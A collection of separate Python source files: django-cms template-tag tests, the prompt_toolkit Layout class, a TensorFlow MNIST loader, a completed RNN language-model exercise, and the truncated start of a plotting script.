def test_show_uncached_placeholder_tag_no_use_cache(self):
"""
Tests that {% show_uncached_placeholder %} does not populate cache.
"""
template = '{% load cms_tags %}<h1>{% show_uncached_placeholder "sub" test_page %}</h1>'
base_key = _get_cache_key('_show_placeholder_for_page', self.test_page, "en",
self.test_page.site_id)
cache_key = _clean_key('%s_placeholder:%s' % (base_key, "sub"))
cache_value_before = cache.get(cache_key)
output = self.render(template, self.test_page, {'test_page': self.test_page})
cache_value_after = cache.get(cache_key)
self.assertEqual(output, '<h1>%s</h1>' % self.test_data['text_sub'])
self.assertEqual(cache_value_before, cache_value_after)
self.assertIsNone(cache_value_after)
def test_page_url_by_pk(self):
template = u'{%% load cms_tags %%}{%% page_url %s %%}' % self.test_page2.pk
output = self.render(template, self.test_page)
self.assertEqual(output, self.test_page2.get_absolute_url())
def test_page_url_by_dictionary(self):
template = u'{% load cms_tags %}{% page_url test_dict %}'
output = self.render(template, self.test_page, {'test_dict': {'pk': self.test_page2.pk}})
self.assertEqual(output, self.test_page2.get_absolute_url())
def test_page_url_by_reverse_id(self):
template = u'{%% load cms_tags %%}{%% page_url "%s" %%}' % self.test_page2.reverse_id
output = self.render(template, self.test_page)
self.assertEqual(output, self.test_page2.get_absolute_url())
def test_page_url_by_reverse_id_not_on_a_page(self):
template = u'{%% load cms_tags %%}{%% page_url "%s" %%}' % self.test_page2.reverse_id
output = self.render(template, None)
self.assertEqual(output, self.test_page2.get_absolute_url())
def test_page_url_by_page(self):
template = u'{% load cms_tags %}{% page_url test_page %}'
output = self.render(template, self.test_page, {'test_page': self.test_page2})
self.assertEqual(output, self.test_page2.get_absolute_url())
def test_page_url_by_page_as(self):
template = u'{% load cms_tags %}{% page_url test_page as test_url %}{{ test_url }}'
output = self.render(template, self.test_page, {'test_page': self.test_page2})
self.assertEqual(output, self.test_page2.get_absolute_url())
#
# To ensure compatible behaviour, test that page_url swallows any
# Page.DoesNotExist exceptions when NOT in DEBUG mode.
#
@override_settings(DEBUG=False)
def test_page_url_on_bogus_page(self):
template = u'{% load cms_tags %}{% page_url "bogus_page" %}'
output = self.render(template, self.test_page, {'test_page': self.test_page2})
self.assertEqual(output, '')
#
# To ensure compatible behaviour, test that page_url will raise a
# Page.DoesNotExist exception when the page argument does not eval to a
# valid page
#
@override_settings(DEBUG=True)
def test_page_url_on_bogus_page_in_debug(self):
template = u'{% load cms_tags %}{% page_url "bogus_page" %}'
self.assertRaises(
Page.DoesNotExist,
self.render,
template,
self.test_page,
{'test_page': self.test_page2}
)
#
# In the 'as varname' form, ensure that the tag will always swallow
# Page.DoesNotExist exceptions both when DEBUG is False and...
#
@override_settings(DEBUG=False)
def test_page_url_as_on_bogus_page(self):
template = u'{% load cms_tags %}{% page_url "bogus_page" as test_url %}{{ test_url }}'
output = self.render(template, self.test_page, {'test_page': self.test_page2})
self.assertEqual(output, '')
#
# ...when it is True.
#
@override_settings(DEBUG=True)
def test_page_url_as_on_bogus_page_in_debug(self):
template = u'{% load cms_tags %}{% page_url "bogus_page" as test_url %}{{ test_url }}'
output = self.render(template, self.test_page, {'test_page': self.test_page2})
self.assertEqual(output, '')
def test_page_attribute(self):
"""
Tests the {% page_attribute %} templatetag, using current page, lookup by pk/dict/reverse_id and passing a Page object.
"""
t = u'{% load cms_tags %}' + \
u'|{% page_attribute title %}' + \
u'{% page_attribute title as title %}' + \
u'|{{ title }}' + \
u'|{% page_attribute title ' + str(self.test_page2.pk) + ' %}' + \
u'{% page_attribute title ' + str(self.test_page2.pk) + ' as title %}' + \
u'|{{ title }}' + \
u'|{% page_attribute title test_dict %}' + \
u'{% page_attribute title test_dict as title %}' + \
u'|{{ title }}' + \
u'|{% page_attribute slug "' + str(self.test_page2.reverse_id) + '" %}' + \
u'{% page_attribute slug "' + str(self.test_page2.reverse_id) + '" as slug %}' + \
u'|{{ slug }}' + \
u'|{% page_attribute slug test_page %}' + \
u'{% page_attribute slug test_page as slug %}' + \
u'|{{ slug }}'
r = self.render(t, self.test_page, {'test_page': self.test_page2, 'test_dict': {'pk': self.test_page2.pk}})
self.assertEqual(r, (u'|' + self.test_data['title']) * 2 + (u'|' + self.test_data2['title']) * 4 + (
u'|' + self.test_data2['slug']) * 4)
def test_inherit_placeholder(self):
t = u'{% load cms_tags %}' + \
u'|{% placeholder "main" inherit %}|{% placeholder "sub" %}'
r = self.render(t, self.test_page3)
self.assertEqual(r, u'|' + self.test_data['text_main'] + '|' + self.test_data3['text_sub'])
def test_extra_context_isolation(self):
with ChangeModel(self.test_page, template='extra_context.html'):
response = self.client.get(self.test_page.get_absolute_url())
self.assertTrue('width' not in response.context)
def test_render_placeholder_toolbar(self):
placeholder = Placeholder()
placeholder.slot = 'test'
placeholder.pk = placeholder.id = 99
context = SekizaiContext()
context['request'] = AttributeObject(
REQUEST={'language': 'en'},
GET=[],
session={},
path='/',
user=self.test_user,
current_page=None,
method='GET',
)
classes = [
"cms_placeholder-%s" % placeholder.pk,
'cms_placeholder',
]
output = render_placeholder_toolbar(placeholder, context, 'test', 'en')
for cls in classes:
self.assertTrue(cls in output, '%r is not in %r' % (cls, output))
|
|
"""
Wrapper for the layout.
"""
from typing import Dict, Generator, Iterable, List, Optional, Union
from prompt_toolkit.buffer import Buffer
from .containers import (
AnyContainer,
ConditionalContainer,
Container,
Window,
to_container,
)
from .controls import BufferControl, SearchBufferControl, UIControl
__all__ = [
"Layout",
"InvalidLayoutError",
"walk",
]
FocusableElement = Union[str, Buffer, UIControl, AnyContainer]
class Layout:
"""
The layout for a prompt_toolkit
:class:`~prompt_toolkit.application.Application`.
This also keeps track of which user control is focused.
:param container: The "root" container for the layout.
:param focused_element: element to be focused initially. (Can be anything
the `focus` function accepts.)
"""
def __init__(
self,
container: AnyContainer,
focused_element: Optional[FocusableElement] = None,
) -> None:
self.container = to_container(container)
self._stack: List[Window] = []
# Map search BufferControl back to the original BufferControl.
# This is used to keep track of when exactly we are searching, and for
# applying the search.
# When a link exists in this dictionary, that means the search is
# currently active.
# Map: search_buffer_control -> original buffer control.
self.search_links: Dict[SearchBufferControl, BufferControl] = {}
# Mapping that maps the children in the layout to their parent.
# This relationship is calculated dynamically, each time when the UI
# is rendered. (UI elements have only references to their children.)
self._child_to_parent: Dict[Container, Container] = {}
if focused_element is None:
try:
self._stack.append(next(self.find_all_windows()))
except StopIteration as e:
raise InvalidLayoutError(
"Invalid layout. The layout does not contain any Window object."
) from e
else:
self.focus(focused_element)
# List of visible windows.
self.visible_windows: List[Window] = [] # List of `Window` objects.
def __repr__(self) -> str:
return "Layout(%r, current_window=%r)" % (self.container, self.current_window)
def find_all_windows(self) -> Generator[Window, None, None]:
"""
Find all the :class:`.UIControl` objects in this layout.
"""
for item in self.walk():
if isinstance(item, Window):
yield item
def find_all_controls(self) -> Iterable[UIControl]:
for container in self.find_all_windows():
yield container.content
def focus(self, value: FocusableElement) -> None:
"""
Focus the given UI element.
`value` can be either:
- a :class:`.UIControl`
- a :class:`.Buffer` instance or the name of a :class:`.Buffer`
- a :class:`.Window`
- Any container object. In this case we will focus the :class:`.Window`
from this container that was focused most recent, or the very first
focusable :class:`.Window` of the container.
"""
# BufferControl by buffer name.
if isinstance(value, str):
for control in self.find_all_controls():
if isinstance(control, BufferControl) and control.buffer.name == value:
self.focus(control)
return
raise ValueError(
"Couldn't find Buffer in the current layout: %r." % (value,)
)
# BufferControl by buffer object.
elif isinstance(value, Buffer):
for control in self.find_all_controls():
if isinstance(control, BufferControl) and control.buffer == value:
self.focus(control)
return
raise ValueError(
"Couldn't find Buffer in the current layout: %r." % (value,)
)
# Focus UIControl.
elif isinstance(value, UIControl):
if value not in self.find_all_controls():
raise ValueError(
"Invalid value. Container does not appear in the layout."
)
if not value.is_focusable():
raise ValueError("Invalid value. UIControl is not focusable.")
self.current_control = value
# Otherwise, expecting any Container object.
else:
value = to_container(value)
if isinstance(value, Window):
# This is a `Window`: focus that.
if value not in self.find_all_windows():
raise ValueError(
"Invalid value. Window does not appear in the layout: %r"
% (value,)
)
self.current_window = value
else:
# Focus a window in this container.
# If we have many windows as part of this container, and some
# of them have been focused before, take the last focused
# item. (This is very useful when the UI is composed of more
# complex sub components.)
windows = []
for c in walk(value, skip_hidden=True):
if isinstance(c, Window) and c.content.is_focusable():
windows.append(c)
# Take the first one that was focused before.
for w in reversed(self._stack):
if w in windows:
self.current_window = w
return
# None was focused before: take the very first focusable window.
if windows:
self.current_window = windows[0]
return
raise ValueError(
"Invalid value. Container cannot be focused: %r" % (value,)
)
def has_focus(self, value: FocusableElement) -> bool:
"""
Check whether the given control has the focus.
:param value: :class:`.UIControl` or :class:`.Window` instance.
"""
if isinstance(value, str):
if self.current_buffer is None:
return False
return self.current_buffer.name == value
if isinstance(value, Buffer):
return self.current_buffer == value
if isinstance(value, UIControl):
return self.current_control == value
else:
value = to_container(value)
if isinstance(value, Window):
return self.current_window == value
else:
# Check whether this "container" is focused. This is true if
# one of the elements inside is focused.
for element in walk(value):
if element == self.current_window:
return True
return False
@property
def current_control(self) -> UIControl:
"""
Get the :class:`.UIControl` to currently has the focus.
"""
return self._stack[-1].content
@current_control.setter
def current_control(self, control: UIControl) -> None:
"""
Set the :class:`.UIControl` to receive the focus.
"""
for window in self.find_all_windows():
if window.content == control:
self.current_window = window
return
raise ValueError("Control not found in the user interface.")
@property
def current_window(self) -> Window:
" Return the :class:`.Window` object that is currently focused. "
return self._stack[-1]
@current_window.setter
def current_window(self, value: Window):
" Set the :class:`.Window` object to be currently focused. "
self._stack.append(value)
@property
def is_searching(self) -> bool:
" True if we are searching right now. "
return self.current_control in self.search_links
@property
def search_target_buffer_control(self) -> Optional[BufferControl]:
"""
Return the :class:`.BufferControl` in which we are searching or `None`.
"""
# Not every `UIControl` is a `BufferControl`. This only applies to
# `BufferControl`.
control = self.current_control
if isinstance(control, SearchBufferControl):
return self.search_links.get(control)
else:
return None
def get_focusable_windows(self) -> Iterable[Window]:
"""
Return all the :class:`.Window` objects which are focusable (in the
'modal' area).
"""
for w in self.walk_through_modal_area():
if isinstance(w, Window) and w.content.is_focusable():
yield w
def get_visible_focusable_windows(self) -> List[Window]:
"""
Return a list of :class:`.Window` objects that are focusable.
"""
# focusable windows are windows that are visible, but also part of the
# modal container. Make sure to keep the ordering.
visible_windows = self.visible_windows
return [w for w in self.get_focusable_windows() if w in visible_windows]
@property
def current_buffer(self) -> Optional[Buffer]:
"""
The currently focused :class:`~.Buffer` or `None`.
"""
ui_control = self.current_control
if isinstance(ui_control, BufferControl):
return ui_control.buffer
return None
def get_buffer_by_name(self, buffer_name: str) -> Optional[Buffer]:
"""
Look in the layout for a buffer with the given name.
Return `None` when nothing was found.
"""
for w in self.walk():
if isinstance(w, Window) and isinstance(w.content, BufferControl):
if w.content.buffer.name == buffer_name:
return w.content.buffer
return None
@property
def buffer_has_focus(self) -> bool:
"""
Return `True` if the currently focused control is a
:class:`.BufferControl`. (For instance, used to determine whether the
default key bindings should be active or not.)
"""
ui_control = self.current_control
return isinstance(ui_control, BufferControl)
@property
def previous_control(self) -> UIControl:
"""
Get the :class:`.UIControl` to previously had the focus.
"""
try:
return self._stack[-2].content
except IndexError:
return self._stack[-1].content
def focus_last(self) -> None:
"""
Give the focus to the last focused control.
"""
if len(self._stack) > 1:
self._stack = self._stack[:-1]
def focus_next(self) -> None:
"""
Focus the next visible/focusable Window.
"""
windows = self.get_visible_focusable_windows()
if len(windows) > 0:
try:
index = windows.index(self.current_window)
except ValueError:
index = 0
else:
index = (index + 1) % len(windows)
self.focus(windows[index])
def focus_previous(self) -> None:
"""
Focus the previous visible/focusable Window.
"""
windows = self.get_visible_focusable_windows()
if len(windows) > 0:
try:
index = windows.index(self.current_window)
except ValueError:
index = 0
else:
index = (index - 1) % len(windows)
self.focus(windows[index])
def walk(self) -> Iterable[Container]:
"""
Walk through all the layout nodes (and their children) and yield them.
"""
for i in walk(self.container):
yield i
def walk_through_modal_area(self) -> Iterable[Container]:
"""
Walk through all the containers which are in the current 'modal' part
of the layout.
"""
# Go up in the tree, and find the root. (it will be a part of the
# layout, if the focus is in a modal part.)
root: Container = self.current_window
while not root.is_modal() and root in self._child_to_parent:
root = self._child_to_parent[root]
for container in walk(root):
yield container
def update_parents_relations(self) -> None:
"""
Update child->parent relationships mapping.
"""
parents = {}
def walk(e: Container) -> None:
for c in e.get_children():
parents[c] = e
walk(c)
walk(self.container)
self._child_to_parent = parents
def reset(self) -> None:
# Remove all search links when the UI starts.
# (Important, for instance when control-c is been pressed while
# searching. The prompt cancels, but next `run()` call the search
# links are still there.)
self.search_links.clear()
self.container.reset()
def get_parent(self, container: Container) -> Optional[Container]:
"""
Return the parent container for the given container, or ``None``, if it
wasn't found.
"""
try:
return self._child_to_parent[container]
except KeyError:
return None
class InvalidLayoutError(Exception):
pass
def walk(container: Container, skip_hidden: bool = False) -> Iterable[Container]:
"""
Walk through layout, starting at this container.
"""
# When `skip_hidden` is set, don't go into disabled ConditionalContainer containers.
if (
skip_hidden
and isinstance(container, ConditionalContainer)
and not container.filter()
):
return
yield container
for c in container.get_children():
# yield from walk(c)
yield from walk(c, skip_hidden=skip_hidden)
|
|
"""Functions for downloading and reading MNIST data."""
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import tempfile
import numpy
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.platform.default import _gfile as gfile
from tensorflow.python.framework import dtypes
from tensorflow.contrib.learn.python.learn.datasets import base
SOURCE_URL = 'http://yann.lecun.com/exdb/mnist/'
def _read32(bytestream):
dt = numpy.dtype(numpy.uint32).newbyteorder('>')
return numpy.frombuffer(bytestream.read(4), dtype=dt)[0]
def extract_images(filename):
"""Extract the images into a 4D uint8 numpy array [index, y, x, depth]."""
print('Extracting', filename)
with gfile.Open(filename, 'rb') as f, gzip.GzipFile(fileobj=f) as bytestream:
magic = _read32(bytestream)
if magic != 2051:
raise ValueError(
'Invalid magic number %d in MNIST image file: %s' %
(magic, filename))
num_images = _read32(bytestream)
rows = _read32(bytestream)
cols = _read32(bytestream)
buf = bytestream.read(rows * cols * num_images)
data = numpy.frombuffer(buf, dtype=numpy.uint8)
data = data.reshape(num_images, rows, cols, 1)
return data
def dense_to_one_hot(labels_dense, num_classes):
"""Convert class labels from scalars to one-hot vectors."""
num_labels = labels_dense.shape[0]
index_offset = numpy.arange(num_labels) * num_classes
labels_one_hot = numpy.zeros((num_labels, num_classes))
labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1
return labels_one_hot
def extract_labels(filename, one_hot=False, num_classes=10):
"""Extract the labels into a 1D uint8 numpy array [index]."""
print('Extracting', filename)
with gfile.Open(filename, 'rb') as f, gzip.GzipFile(fileobj=f) as bytestream:
magic = _read32(bytestream)
if magic != 2049:
raise ValueError(
'Invalid magic number %d in MNIST label file: %s' %
(magic, filename))
num_items = _read32(bytestream)
buf = bytestream.read(num_items)
labels = numpy.frombuffer(buf, dtype=numpy.uint8)
if one_hot:
return dense_to_one_hot(labels, num_classes)
return labels
class DataSet(object):
def __init__(self, images, labels, fake_data=False, one_hot=False,
dtype=dtypes.float32):
"""Construct a DataSet.
one_hot arg is used only if fake_data is true. `dtype` can be either
`uint8` to leave the input as `[0, 255]`, or `float32` to rescale into
`[0, 1]`.
"""
dtype = dtypes.as_dtype(dtype).base_dtype
if dtype not in (dtypes.uint8, dtypes.float32):
raise TypeError('Invalid image dtype %r, expected uint8 or float32' %
dtype)
if fake_data:
self._num_examples = 10000
self.one_hot = one_hot
else:
assert images.shape[0] == labels.shape[0], (
'images.shape: %s labels.shape: %s' % (images.shape,
labels.shape))
self._num_examples = images.shape[0]
# Convert shape from [num examples, rows, columns, depth]
# to [num examples, rows*columns] (assuming depth == 1)
assert images.shape[3] == 1
images = images.reshape(images.shape[0],
images.shape[1] * images.shape[2])
if dtype == dtypes.float32:
# Convert from [0, 255] -> [0.0, 1.0].
images = images.astype(numpy.float32)
images = numpy.multiply(images, 1.0 / 255.0)
self._images = images
self._labels = labels
self._epochs_completed = 0
self._index_in_epoch = 0
@property
def images(self):
return self._images
@property
def labels(self):
return self._labels
@property
def num_examples(self):
return self._num_examples
@property
def epochs_completed(self):
return self._epochs_completed
def next_batch(self, batch_size, fake_data=False):
"""Return the next `batch_size` examples from this data set."""
if fake_data:
fake_image = [1] * 784
if self.one_hot:
fake_label = [1] + [0] * 9
else:
fake_label = 0
return [fake_image for _ in xrange(batch_size)], [
fake_label for _ in xrange(batch_size)]
start = self._index_in_epoch
self._index_in_epoch += batch_size
if self._index_in_epoch > self._num_examples:
# Finished epoch
self._epochs_completed += 1
# Shuffle the data
perm = numpy.arange(self._num_examples)
numpy.random.shuffle(perm)
self._images = self._images[perm]
self._labels = self._labels[perm]
# Start next epoch
start = 0
self._index_in_epoch = batch_size
assert batch_size <= self._num_examples
end = self._index_in_epoch
return self._images[start:end], self._labels[start:end]
def read_data_sets(train_dir, fake_data=False, one_hot=False, dtype=dtypes.float32):
if fake_data:
def fake():
return DataSet([], [], fake_data=True, one_hot=one_hot, dtype=dtype)
train = fake()
validation = fake()
test = fake()
return base.Datasets(train=train, validation=validation, test=test)
TRAIN_IMAGES = 'train-images-idx3-ubyte.gz'
TRAIN_LABELS = 'train-labels-idx1-ubyte.gz'
TEST_IMAGES = 't10k-images-idx3-ubyte.gz'
TEST_LABELS = 't10k-labels-idx1-ubyte.gz'
VALIDATION_SIZE = 5000
local_file = base.maybe_download(TRAIN_IMAGES, train_dir, SOURCE_URL + TRAIN_IMAGES)
train_images = extract_images(local_file)
local_file = base.maybe_download(TRAIN_LABELS, train_dir, SOURCE_URL + TRAIN_LABELS)
train_labels = extract_labels(local_file, one_hot=one_hot)
local_file = base.maybe_download(TEST_IMAGES, train_dir, SOURCE_URL + TEST_IMAGES)
test_images = extract_images(local_file)
local_file = base.maybe_download(TEST_LABELS, train_dir, SOURCE_URL + TEST_LABELS)
test_labels = extract_labels(local_file, one_hot=one_hot)
validation_images = train_images[:VALIDATION_SIZE]
validation_labels = train_labels[:VALIDATION_SIZE]
train_images = train_images[VALIDATION_SIZE:]
train_labels = train_labels[VALIDATION_SIZE:]
train = DataSet(train_images, train_labels, dtype=dtype)
validation = DataSet(validation_images, validation_labels,
dtype=dtype)
test = DataSet(test_images, test_labels, dtype=dtype)
return base.Datasets(train=train, validation=validation, test=test)
def load_mnist():
return read_data_sets("MNIST_data")
|
|
import getpass
import sys
import time
import numpy as np
from copy import deepcopy
from utils import calculate_perplexity, get_ptb_dataset, Vocab
from utils import ptb_iterator, sample
import tensorflow as tf
from tensorflow.python.ops.seq2seq import sequence_loss
from model import LanguageModel
# Let's set the parameters of our model
# http://arxiv.org/pdf/1409.2329v4.pdf shows parameters that would achieve near
# SotA numbers
class Config(object):
"""Holds model hyperparams and data information.
The config class is used to store various hyperparameters and dataset
information parameters. Model objects are passed a Config() object at
instantiation.
"""
batch_size = 64
embed_size = 50
hidden_size = 100
num_steps = 10
max_epochs = 16
early_stopping = 2
dropout = 0.9
lr = 0.001
class RNNLM_Model(LanguageModel):
def load_data(self, debug=False):
"""Loads starter word-vectors and train/dev/test data."""
self.vocab = Vocab()
self.vocab.construct(get_ptb_dataset('train'))
self.encoded_train = np.array(
[self.vocab.encode(word) for word in get_ptb_dataset('train')],
dtype=np.int32)
self.encoded_valid = np.array(
[self.vocab.encode(word) for word in get_ptb_dataset('valid')],
dtype=np.int32)
self.encoded_test = np.array(
[self.vocab.encode(word) for word in get_ptb_dataset('test')],
dtype=np.int32)
if debug:
num_debug = 1024
self.encoded_train = self.encoded_train[:num_debug]
self.encoded_valid = self.encoded_valid[:num_debug]
self.encoded_test = self.encoded_test[:num_debug]
def add_placeholders(self):
"""Generate placeholder variables to represent the input tensors
These placeholders are used as inputs by the rest of the model building
code and will be fed data during training. Note that when "None" is in a
placeholder's shape, it's flexible
Adds following nodes to the computational graph.
(When None is in a placeholder's shape, it's flexible)
input_placeholder: Input placeholder tensor of shape
(None, num_steps), type tf.int32
labels_placeholder: Labels placeholder tensor of shape
(None, num_steps), type tf.float32
dropout_placeholder: Dropout value placeholder (scalar),
type tf.float32
Add these placeholders to self as the instance variables
self.input_placeholder
self.labels_placeholder
self.dropout_placeholder
(Don't change the variable names)
"""
### YOUR CODE HERE
self.input_placeholder = tf.placeholder(
tf.int32, shape=[None, self.config.num_steps], name='Input')
self.labels_placeholder = tf.placeholder(
tf.int32, shape=[None, self.config.num_steps], name='Target')
self.dropout_placeholder = tf.placeholder(tf.float32, name='Dropout')
### END YOUR CODE
def add_embedding(self):
"""Add embedding layer.
Hint: This layer should use the input_placeholder to index into the
embedding.
Hint: You might find tf.nn.embedding_lookup useful.
Hint: You might find tf.split, tf.squeeze useful in constructing tensor inputs
Hint: Check the last slide from the TensorFlow lecture.
Hint: Here are the dimensions of the variables you will need to create:
L: (len(self.vocab), embed_size)
Returns:
inputs: List of length num_steps, each of whose elements should be
a tensor of shape (batch_size, embed_size).
"""
# The embedding lookup is currently only implemented for the CPU
with tf.device('/cpu:0'):
### YOUR CODE HERE
embedding = tf.get_variable(
'Embedding',
[len(self.vocab), self.config.embed_size], trainable=True)
inputs = tf.nn.embedding_lookup(embedding, self.input_placeholder)
inputs = [
tf.squeeze(x, [1]) for x in tf.split(1, self.config.num_steps, inputs)]
### END YOUR CODE
return inputs
def add_projection(self, rnn_outputs):
"""Adds a projection layer.
The projection layer transforms the hidden representation to a distribution
over the vocabulary.
Hint: Here are the dimensions of the variables you will need to
create
U: (hidden_size, len(vocab))
b_2: (len(vocab),)
Args:
rnn_outputs: List of length num_steps, each of whose elements should be
a tensor of shape (batch_size, embed_size).
Returns:
outputs: List of length num_steps, each a tensor of shape
(batch_size, len(vocab)
"""
### YOUR CODE HERE
with tf.variable_scope('Projection'):
U = tf.get_variable(
'Matrix', [self.config.hidden_size, len(self.vocab)])
proj_b = tf.get_variable('Bias', [len(self.vocab)])
outputs = [tf.matmul(o, U) + proj_b for o in rnn_outputs]
### END YOUR CODE
return outputs
def add_loss_op(self, output):
"""Adds loss ops to the computational graph.
Hint: Use tensorflow.python.ops.seq2seq.sequence_loss to implement sequence loss.
Args:
output: A tensor of shape (None, self.vocab)
Returns:
loss: A 0-d tensor (scalar)
"""
### YOUR CODE HERE
all_ones = [tf.ones([self.config.batch_size * self.config.num_steps])]
cross_entropy = sequence_loss(
[output], [tf.reshape(self.labels_placeholder, [-1])], all_ones, len(self.vocab))
tf.add_to_collection('total_loss', cross_entropy)
loss = tf.add_n(tf.get_collection('total_loss'))
### END YOUR CODE
return loss
def add_training_op(self, loss):
"""Sets up the training Ops.
Creates an optimizer and applies the gradients to all trainable variables.
The Op returned by this function is what must be passed to the
`sess.run()` call to cause the model to train. See
https://www.tensorflow.org/versions/r0.7/api_docs/python/train.html#Optimizer
for more information.
Hint: Use tf.train.AdamOptimizer for this model.
Calling optimizer.minimize() will return a train_op object.
Args:
loss: Loss tensor, from cross_entropy_loss.
Returns:
train_op: The Op for training.
"""
### YOUR CODE HERE
optimizer = tf.train.AdamOptimizer(self.config.lr)
train_op = optimizer.minimize(self.calculate_loss)
### END YOUR CODE
return train_op
def __init__(self, config):
self.config = config
self.load_data(debug=False)
self.add_placeholders()
self.inputs = self.add_embedding()
self.rnn_outputs = self.add_model(self.inputs)
self.outputs = self.add_projection(self.rnn_outputs)
# We want to check how well we correctly predict the next word
# We cast o to float64 as there are numerical issues at hand
# (i.e. sum(output of softmax) = 1.00000298179 and not 1)
self.predictions = [tf.nn.softmax(tf.cast(o, 'float64')) for o in self.outputs]
# Reshape the output into len(vocab) sized chunks - the -1 says as many as
# needed to evenly divide
output = tf.reshape(tf.concat(1, self.outputs), [-1, len(self.vocab)])
self.calculate_loss = self.add_loss_op(output)
self.train_step = self.add_training_op(self.calculate_loss)
def add_model(self, inputs):
"""Creates the RNN LM model.
In the space provided below, you need to implement the equations for the
RNN LM model. Note that you may NOT use built in rnn_cell functions from
tensorflow.
Hint: Use a zeros tensor of shape (batch_size, hidden_size) as
initial state for the RNN. Add this to self as instance variable
self.initial_state
(Don't change variable name)
Hint: Add the last RNN output to self as instance variable
self.final_state
(Don't change variable name)
Hint: Make sure to apply dropout to the inputs and the outputs.
Hint: Use a variable scope (e.g. "RNN") to define RNN variables.
Hint: Perform an explicit for-loop over inputs. You can use
scope.reuse_variables() to ensure that the weights used at each
iteration (each time-step) are the same. (Make sure you don't call
this for iteration 0 though or nothing will be initialized!)
Hint: Here are the dimensions of the various variables you will need to
create:
H: (hidden_size, hidden_size)
I: (embed_size, hidden_size)
b_1: (hidden_size,)
Args:
inputs: List of length num_steps, each of whose elements should be
a tensor of shape (batch_size, embed_size).
Returns:
outputs: List of length num_steps, each of whose elements should be
a tensor of shape (batch_size, hidden_size)
"""
### YOUR CODE HERE
with tf.variable_scope('InputDropout'):
inputs = [tf.nn.dropout(x, self.dropout_placeholder) for x in inputs]
with tf.variable_scope('RNN') as scope:
self.initial_state = tf.zeros(
[self.config.batch_size, self.config.hidden_size])
state = self.initial_state
rnn_outputs = []
for tstep, current_input in enumerate(inputs):
if tstep > 0:
scope.reuse_variables()
RNN_H = tf.get_variable(
'HMatrix', [self.config.hidden_size, self.config.hidden_size])
RNN_I = tf.get_variable(
'IMatrix', [self.config.embed_size, self.config.hidden_size])
RNN_b = tf.get_variable(
'B', [self.config.hidden_size])
state = tf.nn.sigmoid(
tf.matmul(state, RNN_H) + tf.matmul(current_input, RNN_I) + RNN_b)
rnn_outputs.append(state)
self.final_state = rnn_outputs[-1]
with tf.variable_scope('RNNDropout'):
rnn_outputs = [tf.nn.dropout(x, self.dropout_placeholder) for x in rnn_outputs]
### END YOUR CODE
return rnn_outputs
def run_epoch(self, session, data, train_op=None, verbose=10):
config = self.config
dp = config.dropout
if not train_op:
train_op = tf.no_op()
dp = 1
total_steps = sum(1 for x in ptb_iterator(data, config.batch_size, config.num_steps))
total_loss = []
state = self.initial_state.eval()
for step, (x, y) in enumerate(
ptb_iterator(data, config.batch_size, config.num_steps)):
# We need to pass in the initial state and retrieve the final state to give
# the RNN proper history
feed = {self.input_placeholder: x,
self.labels_placeholder: y,
self.initial_state: state,
self.dropout_placeholder: dp}
loss, state, _ = session.run(
[self.calculate_loss, self.final_state, train_op], feed_dict=feed)
total_loss.append(loss)
if verbose and step % verbose == 0:
sys.stdout.write('\r{} / {} : pp = {}'.format(
step, total_steps, np.exp(np.mean(total_loss))))
sys.stdout.flush()
if verbose:
sys.stdout.write('\r')
return np.exp(np.mean(total_loss))
def generate_text(session, model, config, starting_text='<eos>',
stop_length=100, stop_tokens=None, temp=1.0):
"""Generate text from the model.
Hint: Create a feed-dictionary and use sess.run() to execute the model. Note
that you will need to use model.initial_state as a key to feed_dict
Hint: Fetch model.final_state and model.predictions[-1]. (You set
model.final_state in add_model() and model.predictions is set in
__init__)
Hint: Store the outputs of running the model in local variables state and
y_pred (used in the pre-implemented parts of this function.)
Args:
session: tf.Session() object
model: Object of type RNNLM_Model
config: A Config() object
starting_text: Initial text passed to model.
Returns:
output: List of word idxs
"""
state = model.initial_state.eval()
# Imagine tokens as a batch size of one, length of len(tokens[0])
tokens = [model.vocab.encode(word) for word in starting_text.split()]
for i in xrange(stop_length):
### YOUR CODE HERE
feed = {model.input_placeholder: [tokens[-1:]],
model.initial_state: state,
model.dropout_placeholder: 1}
state, y_pred = session.run(
[model.final_state, model.predictions[-1]], feed_dict=feed)
### END YOUR CODE
next_word_idx = sample(y_pred[0], temperature=temp)
tokens.append(next_word_idx)
if stop_tokens and model.vocab.decode(tokens[-1]) in stop_tokens:
break
output = [model.vocab.decode(word_idx) for word_idx in tokens]
return output
def generate_sentence(session, model, config, *args, **kwargs):
"""Convenice to generate a sentence from the model."""
return generate_text(session, model, config, *args, stop_tokens=['<eos>'], **kwargs)
def test_RNNLM():
config = Config()
gen_config = deepcopy(config)
gen_config.batch_size = gen_config.num_steps = 1
# We create the training model and generative model
with tf.variable_scope('RNNLM') as scope:
model = RNNLM_Model(config)
# This instructs gen_model to reuse the same variables as the model above
scope.reuse_variables()
gen_model = RNNLM_Model(gen_config)
init = tf.initialize_all_variables()
saver = tf.train.Saver()
with tf.Session() as session:
best_val_pp = float('inf')
best_val_epoch = 0
session.run(init)
for epoch in xrange(config.max_epochs):
print 'Epoch {}'.format(epoch)
start = time.time()
###
train_pp = model.run_epoch(
session, model.encoded_train,
train_op=model.train_step)
valid_pp = model.run_epoch(session, model.encoded_valid)
print 'Training perplexity: {}'.format(train_pp)
print 'Validation perplexity: {}'.format(valid_pp)
if valid_pp < best_val_pp:
best_val_pp = valid_pp
best_val_epoch = epoch
saver.save(session, './ptb_rnnlm.weights')
if epoch - best_val_epoch > config.early_stopping:
break
print 'Total time: {}'.format(time.time() - start)
saver.restore(session, 'ptb_rnnlm.weights')
test_pp = model.run_epoch(session, model.encoded_test)
print '=-=' * 5
print 'Test perplexity: {}'.format(test_pp)
print '=-=' * 5
starting_text = 'in palo alto'
while starting_text:
print ' '.join(generate_sentence(
session, gen_model, gen_config, starting_text=starting_text, temp=1.0))
starting_text = raw_input('> ')
if __name__ == "__main__":
test_RNNLM()
|
|
"""
Load pp, plot and save
8km difference
"""
import os, sys
#%matplotlib inline
#%pylab inline
import matplotlib
